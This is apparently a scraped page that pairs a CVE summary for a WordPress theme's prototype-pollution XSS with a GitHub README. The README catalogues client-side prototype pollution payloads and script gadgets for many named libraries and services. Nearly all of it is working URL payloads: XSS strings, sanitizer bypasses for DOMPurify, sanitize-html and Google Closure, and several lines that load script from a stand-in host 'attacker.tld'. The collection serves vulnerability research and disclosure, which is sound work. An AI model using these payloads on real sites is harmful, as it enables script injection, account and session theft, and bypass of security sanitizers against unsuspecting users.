Headline
CVE-2023-3933: GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
The Your Journey theme for WordPress is vulnerable to Reflected Cross-Site Scripting via prototype pollution in versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Client-Side Prototype Pollution****Intro
If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski
In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.
Prototype Pollution
Name
Payload
Refs
Found by
Wistia Embedded Video (Fixed)
?proto[test]=test
?proto.test=test
[1]
William Bowling
jQuery query-object plugin
CVE-2021-20083
?proto[test]=test
#proto[test]=test
Sergey Bobrov
jQuery Sparkle
CVE-2021-20084
?proto.test=test
?constructor.prototype.test=test
Sergey Bobrov
V4Fire Core Library
?proto.test=test
?proto[test]=test
?proto[test]={"json":"value"}
Sergey Bobrov
backbone-query-parameters
CVE-2021-20085
?proto.test=test
?constructor.prototype.test=test
?proto.array=1|2|3
[1]
Sergey Bobrov
jQuery BBQ
CVE-2021-20086
?proto[test]=test
?constructor[prototype][test]=test
Sergey Bobrov
jquery-deparam
CVE-2021-20087
?proto[test]=test
?constructor[prototype][test]=test
Sergey Bobrov
MooTools More
CVE-2021-20088
?proto[test]=test
?constructor[prototype][test]=test
Sergey Bobrov
Swiftype Site Search (Fixed)
#proto[test]=test
[1]
s1r1us
CanJS deparam
?proto[test]=test
?constructor[prototype][test]=test
Rahul Maini
Purl (jQuery-URL-Parser)
CVE-2021-20089
?proto[test]=test
?constructor[prototype][test]=test
#proto[test]=test
Sergey Bobrov
HubSpot Tracking Code (Fixed)
?proto[test]=test
?constructor[prototype][test]=test
#proto[test]=test
Sergey Bobrov
YUI 3 querystring-parse
?constructor[prototype][test]=test
Sergey Bobrov
Mutiny (Fixed)
?proto.test=test
SPQR
jQuery parseParams
?proto.test=test
?constructor.prototype.test=test
POSIX
php.js parse_str
?proto[test]=test
?constructor[prototype][test]=test
POSIX
arg.js
?proto[test]=test
?proto.test=test
?constructor[prototype][test]=test
#proto[test]=test
POSIX
davis.js
?proto[test]=test
POSIX
Component querystring
?proto[NUMBER]=test
?proto[123]=test
Masato Kinugawa
Aurelia path
?proto[test]=test
[1]
s1r1us
analytics-utils < 1.0.3
?proto[test]=test
?constructor[prototype][test]=test
[1]
alexdaviestray
Script Gadgets
Name
Payload
Impact
Refs
Found by
Wistia Embedded Video
?proto[innerHTML]=<img/src/onerror%3dalert(1)>
XSS
[1]
William Bowling
jQuery $.get
?proto[context]=<img/src/onerror%3dalert(1)>
&proto[jquery]=x
XSS
Sergey Bobrov
jQuery $.get >= 3.0.0
Boolean.prototype
?proto[url][]=data:,alert(1)//
&proto[dataType]=script
XSS
Michał Bentkowski
jQuery $.get >= 3.0.0
Boolean.prototype
?proto[url]=data:,alert(1)//
&proto[dataType]=script
&proto[crossDomain]=
XSS
Sergey Bobrov
jQuery $.getScript >= 3.4.0
?proto[src][]=data:,alert(1)//
XSS
s1r1us
jQuery $.getScript 3.0.0 - 3.3.1
Boolean.prototype
?proto[url]=data:,alert(1)//
XSS
s1r1us
jQuery $(html)
?proto[div][0]=1
&proto[div][1]=<img/src/onerror%3dalert(1)>
XSS
Sergey Bobrov
jQuery $(x).off
String.prototype
?proto[preventDefault]=x
&proto[handleObj]=x
&proto[delegateTarget]=<img/src/onerror%3dalert(1)>
XSS
Sergey Bobrov
Google reCAPTCHA
?proto[srcdoc][]=<script>alert(1)</script>
XSS
s1r1us
Twitter Universal Website Tag (Fixed)
?proto[hif][]=javascript:alert(1)
XSS
Sergey Bobrov
Tealium Universal Tag
?proto[attrs][src]=1
&proto[src]=data:,alert(1)//
XSS
Sergey Bobrov
Akamai Boomerang
?proto[BOOMR]=1
&proto[url]=//attacker.tld/js.js
XSS
s1r1us
Lodash <= 4.17.15
?proto[sourceURL]=%E2%80%A8%E2%80%A9alert(1)
XSS
[1]
Alex Brasetvik
sanitize-html
?proto[*][]=onload
Bypass
[1]
Michał Bentkowski
sanitize-html
?proto[innerText]=<script>alert(1)</script>
Bypass
[1]
Hpdoger
js-xss
?proto[whiteList][img][0]=onerror
&proto[whiteList][img][1]=src
Bypass
[1]
Michał Bentkowski
DOMPurify <= 2.0.12
?proto[ALLOWED_ATTR][0]=onerror
&proto[ALLOWED_ATTR][1]=src
Bypass
[1]
Michał Bentkowski
DOMPurify <= 2.0.12
?proto[documentMode]=9
Bypass
[1]
Michał Bentkowski
Google Closure
?proto[%20ONERROR]=1
&proto[%20SRC]=1
Bypass
[1]
Michał Bentkowski
Google Closure
?proto[CLOSURE_BASE_PATH]=data:,alert(1)//
XSS
[1]
Michał Bentkowski
Marionette.js / Backbone.js
?proto[tagName]=img
&proto[src][]=x:
&proto[onerror][]=alert(1)
XSS
Sergey Bobrov
Adobe Dynamic Tag Management
?proto[src]=data:,alert(1)//
XSS
Sergey Bobrov
Adobe Dynamic Tag Management
?proto[SRC]=<img/src/onerror%3dalert(1)>
XSS
Sergey Bobrov
Swiftype Site Search
?proto[xxx]=alert(1)
XSS
s1r1us
Embedly Cards
?proto[onload]=alert(1)
XSS
Guilherme Keerok
Segment Analytics.js
?proto[script][0]=1
&proto[script][1]=<img/src/onerror%3dalert(1)>
XSS
Sergey Bobrov
Knockout.js
Array.prototype
?proto[4]=a’:1,[alert(1)]:1,’b
&proto[5]=,
XSS
Michał Bentkowski
Zepto.js
?proto[onerror]=alert(1)
XSS
[1]
lih3iu
Zepto.js
?proto[html]=<img/src/onerror%3dalert(1)>
XSS
Sergey Bobrov
Sprint.js
?proto[div][intro]=<img%20src%20onerror%3dalert(1)>
XSS
[1]
lih3iu
Vue.js
?proto[v-if]=_c.constructor('alert(1)')()
XSS
POSIX
Vue.js
?proto[attrs][0][name]=src
&proto[attrs][0][value]=xxx
&proto[xxx]=data:,alert(1)//
&proto[is]=script
XSS
[1]
s1r1us
Vue.js
?proto[v-bind:class]=’’.constructor.constructor('alert(1)')()
XSS
[1]
r00timentary
Vue.js
?proto[data]=a
&proto[template][nodeType]=a
&proto[template][innerHTML]=<script>alert(1)</script>
XSS
[1]
SuperGuesser
Vue.js
?proto[props][][value]=a
&proto[name]=":’’.constructor.constructor('alert(1)')(),"
XSS
[1]
st98_
Vue.js
?proto[template]=<script>alert(1)</script>
XSS
[1]
huli
Demandbase Tag
?proto[Config][SiteOptimization][enabled]=1
&proto[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?
XSS
SPQR
@analytics/google-tag-manager
?proto[customScriptSrc]=//attacker.tld/xss.js
XSS
SPQR
i18next
?proto[lng]=cimode
&proto[appendNamespaceToCIMode]=x
&proto[nsSeparator]=<img/src/onerror%3dalert(1)>
Potential XSS
Sergey Bobrov
i18next < 19.8.5
?proto[lng]=a
&proto[a]=b
&proto[obj]=c
&proto[k]=d
&proto[d]=<img/src/onerror%3dalert(1)>
Potential XSS
Sergey Bobrov
i18next >= 19.8.5
?proto[lng]=a
&proto[key]=<img/src/onerror%3dalert(1)>
Potential XSS
Sergey Bobrov
Google Analytics
?proto[cookieName]=COOKIE%3DInjection%3B
Cookie Injection
Sergey Bobrov
Popper.js
?proto[arrow][style]=color:red;transition:all%201s
&proto[arrow][ontransitionend]=alert(1)
?proto[reference][style]=color:red;transition:all%201s
&proto[reference][ontransitionend]=alert(2)
?proto[popper][style]=color:red;transition:all%201s
&proto[popper][ontransitionend]=alert(3)
XSS
[1] [2]
Matheus Vrech
Pendo Agent
?proto[dataHost]=attacker.tld/js.js%23
XSS
Renwa
script.aculo.us
String.constructor
?x=x
&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>
XSS
Sergey Bobrov
hCaptcha (Fixed)
?proto[assethost]=javascript:alert(1)//
XSS
Masato Kinugawa
Google Closure
?proto[trustedTypes]=x
&proto[emptyHTML]=<img/src/onerror%3dalert(1)>
XSS
Mathias Karlsson
Google Tag Manager
?proto[vtp_enableRecaptcha]=1
&proto[srcdoc]=<script>alert(1)</script>
XSS
terjanq
Google Tag Manager
?proto[q][0][0]=require
&proto[q][0][1]=x
&proto[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7
XSS
Sergey Bobrov /
Masato Kinugawa
Google Analytics
?proto[q][0][0]=require
&proto[q][0][1]=x
&proto[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7
XSS
Sergey Bobrov /
Masato Kinugawa